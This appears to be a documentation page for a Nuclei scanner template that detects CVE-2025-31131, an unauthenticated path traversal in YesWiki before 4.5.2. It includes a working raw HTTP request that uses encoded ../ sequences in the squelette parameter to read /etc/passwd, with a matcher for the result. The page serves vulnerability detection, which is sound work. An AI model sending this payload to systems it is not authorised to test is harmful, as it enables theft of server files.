Yeswiki < 4.5.2 - Unauthenticated Path Traversal
ID: CVE-2025-31131
Severity: high
Author: iamnoooob,rootxharsh,pdresearch
Tags: cve,cve2025,yeswiki,lfi
Description
Section titled “Description”YesWiki is a wiki system written in PHP. The squelette parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.
YAML Source
Section titled “YAML Source”id: CVE-2025-31131
info: name: Yeswiki < 4.5.2 - Unauthenticated Path Traversal author: iamnoooob,rootxharsh,pdresearch severity: high description: | YesWiki is a wiki system written in PHP. The squelette parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server. remediation: This vulnerability is fixed in 4.5.2. reference: - https://github.com/advisories/GHSA-w34w-fvp3-68xm - https://github.com/YesWiki/yeswiki/commit/f78c915369a60c74ab8f38561ae93a4aaca9b989 - https://github.com/YesWiki/yeswiki/security/advisories/GHSA-w34w-fvp3-68xm classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cve-id: CVE-2025-31131 cwe-id: CWE-22 metadata: verified: true max-request: 1 shodan-query: html:"yeswiki" tags: cve,cve2025,yeswiki,lfi
http: - raw: - | GET /?UrkCEO/edit&theme=margot&squelette=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&style=margot.css HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: word part: header words: - YesWiki-main
- type: regex part: body regex: - "root:.*:0:0:"# digest: 4a0a00473045022100821eb0e0b83402369fe4a407a406b4ff841e4ae0ee4ee88fbea32a93bbf6279402205c096683203cb8106b8746a9e737d7af643dcad9b51913c513100b4cbdf1caf3:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2025/CVE-2025-31131.yaml"